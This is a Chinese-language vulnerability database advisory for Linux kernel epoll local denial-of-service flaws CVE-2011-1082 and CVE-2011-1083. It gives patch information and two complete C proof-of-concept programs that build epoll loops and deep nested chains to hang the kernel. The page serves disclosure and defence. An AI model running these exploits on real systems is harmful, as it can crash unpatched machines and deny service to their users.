Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:30136
HistoryFeb 22, 2012 - 12:00 a.m.

Linux Kernel epoll Subsystem “eventpoll.c”多个本地拒绝服务漏洞

2012-02-2200:00:00
Root
www.seebug.org
39

0.0004 Low

EPSS

Percentile

12.9%

JSON

BUGTRAQ ID: 46630
CVE ID: CVE-2011-1082,CVE-2011-1083

Linux Kernel是Linux操作系统的内核。

Linux Kernel 2.6.38之前版本的fs/eventpoll.c在epoll子系统的实现上存在本地拒绝服务安全漏洞,将epoll文件描述符放置在其他epoll数据结构中,没有检查已关闭的循环或深链接,攻击者可利用此漏洞造成拒绝服务
0
Linux kernel < 2.6.38
厂商补丁:

Linux

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.kernel.org/


                                                #include &lt;unistd.h&gt;
#include &lt;sys/epoll.h&gt;
int main(void) {
     int e1, e2, p[2];
     struct epoll_event evt = {
         .events = EPOLLIN
     };
     e1 = epoll_create(1);
     e2 = epoll_create(2);
     pipe(p);

     epoll_ctl(e2, EPOLL_CTL_ADD, e1, &amp;evt);
     epoll_ctl(e1, EPOLL_CTL_ADD, p[0], &amp;evt);
     write(p[1], p, sizeof p);
     epoll_ctl(e1, EPOLL_CTL_ADD, e2, &amp;evt);

     return 0;
}










http://downloads.securityfocus.com/vulnerabilities/exploits/46630_2.c
#include &lt;unistd.h&gt;
#include &lt;sys/epoll.h&gt;
#include &lt;sys/time.h&gt;
#include &lt;stdio.h&gt;

#define SIZE 250

int main(void) {

    int links[SIZE];
    int links2[SIZE];
    int links3[SIZE];
    int links4[SIZE];
    int i, j;
    int ret;
    int ep1, ep2;
    struct timeval start, end;

    struct epoll_event evt = {
        .events = EPOLLIN
    };

    ep1 = epoll_create(1);
    for (i = 0; i &lt; SIZE; i++) {
        links[i] = epoll_create(1);
        ret = epoll_ctl(ep1, EPOLL_CTL_ADD, links[i], &amp;evt);
        if (ret)
            perror(&quot;error 1&quot;);
    }
    for (i = 0; i &lt; SIZE; i++) {
        links2[i] = epoll_create(1);
        for (j = 0; j &lt; SIZE; j++) {
            epoll_ctl(links[j], EPOLL_CTL_ADD, links2[i], &amp;evt);
            if (ret)
                perror(&quot;error 2&quot;);
        }
    }
    for (i = 0; i &lt; SIZE; i++) {
        links3[i] = epoll_create(1);
        for (j = 0; j &lt; SIZE; j++) {
            epoll_ctl(links2[j], EPOLL_CTL_ADD, links3[i], &amp;evt);
            if (ret)
                perror(&quot;error 3&quot;);
        }
    }
    for (i = 0; i &lt; SIZE; i++) {
        links4[i] = epoll_create(1);
        for (j = 0; j &lt; SIZE; j++) {
            epoll_ctl(links3[j], EPOLL_CTL_ADD, links4[i], &amp;evt);
            if (ret)
                perror(&quot;error 4&quot;);
        }
    }

    ep2 = epoll_create(1);
    gettimeofday(&amp;start, NULL);
    ret = epoll_ctl(ep2, EPOLL_CTL_ADD, ep1, &amp;evt);
    /* creates a loop */
    //ret = epoll_ctl(links4[499], EPOLL_CTL_ADD, ep1, &amp;evt);
    if (ret)
        perror(&quot;error 5&quot;);
    gettimeofday(&amp;end, NULL);

    printf(&quot;%ld\n&quot;, ((end.tv_sec * 1000000 + end.tv_usec)
        - (start.tv_sec * 1000000 + start.tv_usec)));

    return 0;

}

Related

veracode 3
ubuntucve 3
cve 3
prion 3
nessus 44
openvas 63
redhat 7
oraclelinux 7
securityvulns 2
centos 2
debiancve 1
amazon 2
fedora 13
suse 7
ubuntu 6
packetstorm 1
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:58:05
Denial Of Service (DoS)
2019-01-15 08:50:47
Denial Of Service (DoS)
2019-05-02 04:41:57
ubuntucve
ubuntucve
CVE-2011-1082
2011-04-04 00:00:00
CVE-2011-1083
2011-04-04 00:00:00
CVE-2012-3375
2012-07-04 00:00:00
cve
cve
CVE-2011-1082
2011-04-04 12:27:00
CVE-2011-1083
2011-04-04 12:27:00
CVE-2012-3375
2012-10-03 11:02:00
prion
prion
Code injection
2011-04-04 12:27:00
Privilege escalation
2011-04-04 12:27:00
Code injection
2012-10-03 11:02:00
nessus
nessus
Oracle Linux 5 : kernel (ELSA-2012-0150)
2013-07-12 00:00:00
Oracle Linux 5 : ELSA-2012-0150-1: / Oracle / Linux / 5.8 / kernel (ELSA-2012-01501)
2023-09-07 00:00:00
RHEL 5 : kernel (RHSA-2012:0150)
2012-02-21 00:00:00
openvas
openvas
Oracle: Security Advisory (ELSA-2012-0150-1)
2015-10-06 00:00:00
CentOS Update for kernel CESA-2012:0862 centos6
2012-07-30 00:00:00
RedHat Update for Red Hat Enterprise Linux 6 kernel RHSA-2012:0862-04
2012-06-22 00:00:00
redhat
redhat
(RHSA-2012:0150) Moderate: Red Hat Enterprise Linux 5.8 kernel update
2012-02-21 00:00:00
(RHSA-2012:0862) Moderate: Red Hat Enterprise Linux 6 kernel security, bug fix and enhancement update
2012-06-20 00:00:00
(RHSA-2012:1061) Moderate: kernel security and bug fix update
2012-07-10 00:00:00
oraclelinux
oraclelinux
1
2012-03-01 00:00:00
Unbreakable Enterprise kernel Security update
2012-07-17 00:00:00
Unbreakable Enterprise kernel Security update
2012-07-16 00:00:00
securityvulns
securityvulns
Linux kernel multiple DoS conditions
2011-06-02 00:00:00
[USN-1141-1] Linux kernel vulnerabilities
2011-06-02 00:00:00
centos
centos
kernel, perf, python security update
2012-07-10 17:23:49
kernel security update
2012-07-10 16:58:44
debiancve
debiancve
CVE-2012-3375
2012-10-03 11:02:00
amazon
amazon
Medium: kernel
2011-11-19 01:22:00
Medium: kernel
2012-07-05 16:19:00
fedora
fedora
[SECURITY] Fedora 15 Update: kernel-2.6.41.1-1.fc15
2011-11-17 23:29:35
[SECURITY] Fedora 15 Update: kernel-2.6.41.4-1.fc15
2011-12-10 19:51:33
[SECURITY] Fedora 15 Update: kernel-2.6.41.9-1.fc15
2012-01-15 19:59:13
suse
suse
Security update for Linux kernel (important)
2012-05-14 16:08:28
Security update for Linux kernel (important)
2012-04-23 22:08:26
kernel update for SLE11 SP2 (important)
2012-04-26 20:08:43
ubuntu
ubuntu
Linux kernel vulnerabilities
2011-06-01 00:00:00
Linux kernel vulnerabilities
2011-06-28 00:00:00
Linux kernel (i.MX51) vulnerabilities
2011-09-13 00:00:00
packetstorm
packetstorm
Ubuntu Security Notice USN-1202-1
2011-09-14 00:00:00

0.0004 Low

EPSS

Percentile

12.9%

JSON
Related for SSV:30136
veracode3ubuntucve3cve3prion3nessus44openvas63redhat7oraclelinux7securityvulns2centos2debiancve1amazon2fedora13suse7ubuntu6packetstorm1